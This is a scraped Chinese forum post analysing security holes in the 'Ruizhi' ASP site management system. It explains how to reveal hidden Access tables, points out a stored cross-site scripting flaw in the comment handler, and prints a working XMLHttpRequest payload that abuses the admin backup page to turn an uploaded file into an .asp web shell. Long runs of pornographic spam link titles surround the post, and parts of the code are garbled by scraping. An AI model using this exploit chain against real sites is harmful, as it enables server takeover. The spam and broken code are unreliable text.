久久精品在这里_成人99免费视频_国产激情视频一区二区在线观看_国产伦精品一区二区三区免费 _亚洲午夜免费福利视频_色狠狠色狠狠综合_av在线综合网_91毛片在线观看_欧美视频一区二区在线观看_极品美女销魂一区二区三区免费_国产亚洲欧美激情_在线免费观看不卡av_日韩不卡一区二区三区_91精品国产麻豆国产自产在线_亚洲国产精品一区二区久久恐怖片_a4yy欧美一区二区三区


曙海教育集團(tuán)論壇開發(fā)語(yǔ)言培訓(xùn)專區(qū)SQL Server數(shù)據(jù)庫(kù) → 利用or構(gòu)造SQL巧妙注射-分析睿智管理系統(tǒng)安全


  共有7695人關(guān)注過本帖樹形打印

主題:利用or構(gòu)造SQL巧妙注射-分析睿智管理系統(tǒng)安全

美女呀,離線,留言給我吧!
wangxinxin
  1樓 個(gè)性首頁(yè) | 博客 | 信息 | 搜索 | 郵箱 | 主頁(yè) | UC


加好友 發(fā)短信
等級(jí):青蜂俠 帖子:1393 積分:14038 威望:0 精華:0 注冊(cè):2010-11-12 11:08:23
利用or構(gòu)造SQL巧妙注射-分析睿智管理系統(tǒng)安全  發(fā)帖心情 Post By:2010-12-13 13:47:46

前言:
???? 最近上cnzz下載了一套網(wǎng)站管理系統(tǒng),在源碼首頁(yè)發(fā)現(xiàn)它,心想cnzz都推薦應(yīng)該安全性相當(dāng)不錯(cuò)了.官方下載最新版本本地搭建IIS測(cè)試發(fā)現(xiàn)簡(jiǎn)潔易用,整體上安全做得不錯(cuò).由于是免費(fèi)版的,可能官方有點(diǎn)放水.不過這里不影響我們的分析,這里討論兩個(gè)方面:跨站的利用,SQL注射.還是一句話:重在思路.
一.隱藏的數(shù)據(jù)庫(kù)
分析代碼經(jīng)常要用到數(shù)據(jù)庫(kù)(我分析的是Access版本的) ,習(xí)慣性的打開數(shù)據(jù)庫(kù),驚奇的發(fā)現(xiàn)只有一個(gè)notdown表,如圖01:
  
可是再仔細(xì)查看代碼發(fā)現(xiàn)不應(yīng)該只有這張表的,于是就想是不是隱藏起來了?第一次看到這種情況,于是就查看了下Access幫助說明,在其中發(fā)現(xiàn)原來有還存在兩種屬性的數(shù)據(jù)表,即系統(tǒng)對(duì)象和隱藏對(duì)象.下面做一個(gè)小知識(shí)補(bǔ)充:
由于Access默認(rèn)是不顯示系統(tǒng)對(duì)象和隱藏對(duì)象的.所以如果一個(gè)表中存在隱藏對(duì)象或者系統(tǒng)對(duì)象那么就無(wú)法看到該表了. 簡(jiǎn)單說下隱藏方法,設(shè)計(jì)好表后右擊表選擇"屬性"->"隱藏"屬性打勾,刷新下就看不到了,這樣就是隱藏對(duì)象了,默認(rèn)是看不到的.至于系統(tǒng)對(duì)象,我們可以修改表的前綴為 usys,這樣就可以把表改成一個(gè)系統(tǒng)對(duì)象.這兩種方法都可以.
既然可以隱藏當(dāng)然也可以恢復(fù)顯示了, 按如下操作:“工具”菜單->“選項(xiàng)”命令->“視圖”選項(xiàng)卡->選中“顯示”一欄下的“系統(tǒng)對(duì)象”復(fù)選框或者"隱藏對(duì)象"復(fù)選框,并按下“確定”按鈕,就可以重新顯示所有表了.如圖02
  
Ok了,數(shù)據(jù)就可以和正常的一樣了.
二.跨站的深入利用雞肋
首先看看漏洞文件/include/PlS.asp,查看代碼發(fā)現(xiàn)是一個(gè)評(píng)論顯示,在多個(gè)文件被包含了,代碼如下:  
"" then
??????Dim Author,Content,mycode
????Author=Trim(Request.Form("Author"))// 簡(jiǎn)單的過濾空格
????Content=Trim(Request.Form("Content")) //同上
????mycode = trim(request.form("code"))
??????if Author="" or Content="" then
??????Call Alert ("請(qǐng)?zhí)顚懲暾偬峤?amp;quot;,"-1")
????end if
????if mycodeSession("getcode") then
?????? Call Alert ("您輸入驗(yàn)證碼錯(cuò)誤","-1")
????end if
??????set rs = server.CreateObject ("adodb.recordset")
????sql="select * from zhi_rui_E_Pl"
????rs.open sql,conn,1,3
????rs.addnew
????rs("cli")=Request.Form("cli")
????rs("Ioid")=request.Form("Inid")
????rs("Author")=Author
????rs("Content")=Content
??------------------------省略部分代碼-------------------------------
%>

顯然沒有任何過濾,直接寫入數(shù)據(jù)庫(kù),跨站產(chǎn)生了.由于數(shù)據(jù)庫(kù)是mdb格式的,所有插馬也沒用.這里就想到了是否可以備份數(shù)據(jù)庫(kù)?進(jìn)入后臺(tái)看到數(shù)據(jù)庫(kù)備份,查看如圖03:
  
看到了沒,據(jù)庫(kù)路徑和備份文件名都不能修改,有些朋友可能就到這里停止,其實(shí)不然,還可以繼續(xù),經(jīng)驗(yàn)告訴我,他是將該輸入框?qū)懗蒱idden隱藏域了,查看文件/admin/Admin_Data.asp代碼如下:  
" size="40" />[/td]

看到這行type=hidden,猜測(cè)沒錯(cuò).那也就是說同樣可以備份任意文件了.所有后臺(tái)拿shell比較簡(jiǎn)單了.(插馬備份數(shù)據(jù)庫(kù)比較麻煩,要繞過// 判斷瀏覽器類型并定義創(chuàng)建xmlhttp會(huì)話
if (window.XMLHttpRequest)
{
??xmlhttp = new XMLHttpRequest();
} else if (window.ActiveXObject)
{
??try
??{
????xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
??}
??catch (e)
??{
????try
????{
??????xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
????}
????catch (e)
????{
????}
??}
}
function backup()
{
??var postStr = "DBpath=upload/2009082150598817.jpg&bkfolder=../DataBase/bak/&bkDBname=l4nk0r.asp";
??xmlhttp.open(&quot圖片點(diǎn)擊可在新窗口打開查看OST","/admin/Admin_data.asp?action=RestoreData&act=Restore",true);
??xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
??xmlhttp.send(postStr);
}
Backup();

然后在你要提交的地方提交

支持(0中立(0反對(duì)(0單帖管理 | 引用 | 回復(fù) 回到頂部

返回版面帖子列表

利用or構(gòu)造SQL巧妙注射-分析睿智管理系統(tǒng)安全








簽名
久久精品在这里_成人99免费视频_国产激情视频一区二区在线观看_国产伦精品一区二区三区免费 _亚洲午夜免费福利视频_色狠狠色狠狠综合_av在线综合网_91毛片在线观看_欧美视频一区二区在线观看_极品美女销魂一区二区三区免费_国产亚洲欧美激情_在线免费观看不卡av_日韩不卡一区二区三区_91精品国产麻豆国产自产在线_亚洲国产精品一区二区久久恐怖片_a4yy欧美一区二区三区
加勒比在线一区二区三区观看| 国产情人综合久久777777| 国产欧美一区二区精品婷婷 | 四虎一区二区| 一区二区久久久久久| 日本一区二区三区在线视频 | 亚洲va久久久噜噜噜久久狠狠| 成人欧美一区二区三区1314| 国产精品v欧美精品∨日韩| 国产欧美一区二区三区鸳鸯浴| 国产精品.com| 一区二区在线电影| 亚洲欧洲精品在线| 青青草成人在线观看| 欧美精品自拍偷拍| av在线不卡免费看| 国产精品乱码一区二三区小蝌蚪| 免费久久99精品国产自| 五月激情综合网| 精品视频一区二区不卡| 成人中文字幕电影| 国产视频在线观看一区二区三区| 国产一区再线| 日韩中文字幕亚洲一区二区va在线| 91福利区一区二区三区| 国产成人av一区| 国产精品欧美综合在线| 亚洲啪啪av| 国产成人福利片| 国产精品久久久久久亚洲伦| 亚洲黄色成人久久久| 国产乱码精品一品二品| 国产精品水嫩水嫩| 色呦呦国产精品| 波多野结衣欧美| 亚洲裸体xxx| 欧美精品xxxxbbbb| 成人欧美一区二区三区视频| 亚洲成人在线观看视频| 69成人精品免费视频| 国产成人成网站在线播放青青| 亚洲在线成人精品| 欧美一三区三区四区免费在线看| 国产精品v欧美精品∨日韩| 午夜精品一区二区三区免费视频| 欧美一区二区成人| 欧美久久电影| 国产ts人妖一区二区| 亚洲欧洲综合另类| 欧美精品在线观看一区二区| 国产乱人伦精品一区二区| 青青草成人在线观看| 国产三级三级三级精品8ⅰ区| 天堂av一区二区| 成人av综合在线| 亚洲成a人片综合在线| 欧美电影精品一区二区| 日韩免费三级| av在线综合网| 日本 国产 欧美色综合| 国产亚洲va综合人人澡精品| 在线视频福利一区| 国产成人精品日本亚洲11 | 精品国产百合女同互慰| 色999日韩自偷自拍美女| 成人一区二区三区视频| 亚洲成在线观看| 久久精品夜色噜噜亚洲aⅴ| 中文网丁香综合网| 国产欧美日韩综合精品二区| 国内成人自拍视频| 亚洲免费在线视频| 日韩色视频在线观看| 亚洲精品国产一区| 成人午夜电影在线播放| 国内精品国产三级国产a久久| 亚洲裸体xxx| 精品欧美久久久| 欧美在线短视频| 日本高清不卡一区二区三| 成人av在线电影| 日韩在线一区二区三区| 国产精品对白交换视频| 欧美变态tickling挠脚心| 色狠狠一区二区| 欧美日韩一区二区三区在线观看免 | 一本色道a无线码一区v| 国产一区二区三区奇米久涩| 国产99久久久国产精品| 日韩经典一区二区| 亚洲女人的天堂| 国产女主播视频一区二区| 欧美一区二区三区性视频| 色婷婷亚洲婷婷| 日韩高清三级| 国外成人免费视频| 91免费在线看| 成人网在线免费视频| 精品在线播放午夜| 日韩精品欧美成人高清一区二区| 亚洲色图在线视频| 国产精品视频免费| 337p粉嫩大胆色噜噜噜噜亚洲| 欧美日韩国产一级片| 一本一道久久a久久精品| 欧美lavv| 精品麻豆av| 国产欧美一区二区三区不卡高清| 99精品视频免费在线观看| 懂色av中文一区二区三区| 精品制服美女久久| 蜜桃久久久久久| 日本三级亚洲精品| 午夜一区二区三区在线观看| 亚洲综合色噜噜狠狠| 亚洲卡通欧美制服中文| 成人欧美一区二区三区在线播放| 日本一区二区三区在线不卡| 国产亚洲成av人在线观看导航| 精品剧情v国产在线观看在线| 欧美一二三四在线| 日韩美一区二区三区| 日韩午夜激情视频| 日韩欧美国产电影| 日韩三级视频在线看| 国产视频不卡一区| 精品视频第一区| 国产精品99久久久久久久| 91欧美一区二区| 91蝌蚪porny| 91精品国产一区二区三区动漫| av在线不卡免费看| 91在线小视频| 99久久免费国| 久久国产精品亚洲va麻豆| 国产欧美日韩一区二区三区| 精品亚洲欧美日韩| 欧美精品v日韩精品v国产精品| 欧美成熟毛茸茸复古| 日韩福利在线| 色婷婷av一区二区三区之一色屋| 色婷婷精品久久二区二区蜜臂av| 欧美优质美女网站| 欧美一区二区三区视频在线观看| 欧美一区二区三区男人的天堂 | 99久热re在线精品视频| 国产区一区二区三区| 茄子视频成人在线观看| 亚洲视频电影| 欧美日韩久久久久久| 精品久久久久久综合日本欧美 | 午夜老司机精品| 色婷婷av一区二区三区软件| 欧美群妇大交群中文字幕| 欧美大片在线观看| 国产精品久久久久久久第一福利 | 欧美一级电影网站| 国产片一区二区三区| 亚洲精品免费看| 免费av网站大全久久| 成人免费看黄yyy456| 国产欧美韩日| 伊人久久av导航| 91精品婷婷国产综合久久性色| 久久久www成人免费无遮挡大片 | 在线一区二区视频| 日韩精品一区二区在线| 国产精品久久久久久久久免费丝袜 | 国产综合av一区二区三区| 日本最新一区二区三区视频观看| 日本黄色一区二区| 亚洲精品一区二区三区香蕉| 亚洲天天做日日做天天谢日日欢 | 亚洲精品一区二区三区福利| 综合色天天鬼久久鬼色| 日韩不卡手机在线v区| 成人久久久精品乱码一区二区三区| 福利视频一区二区三区| 亚洲欧洲日夜超级视频| 日韩三级在线观看| 一二三四区精品视频| 国产九九视频一区二区三区| 国产无套精品一区二区| 欧美性受极品xxxx喷水| 日本一区二区三区在线观看| 日韩在线卡一卡二| 91女人视频在线观看| 色哟哟欧美精品| 欧美高清在线视频| 蜜臀av性久久久久蜜臀aⅴ | 亚洲尤物视频在线| 国产99精品国产| 日本成人三级| 精品日本一线二线三线不卡 | 91精品国产色综合久久ai换脸| 亚洲欧洲一区二区三区| 国产尤物一区二区在线| 美女黄毛**国产精品啪啪| 欧美一区二区成人6969| 亚洲一区av在线|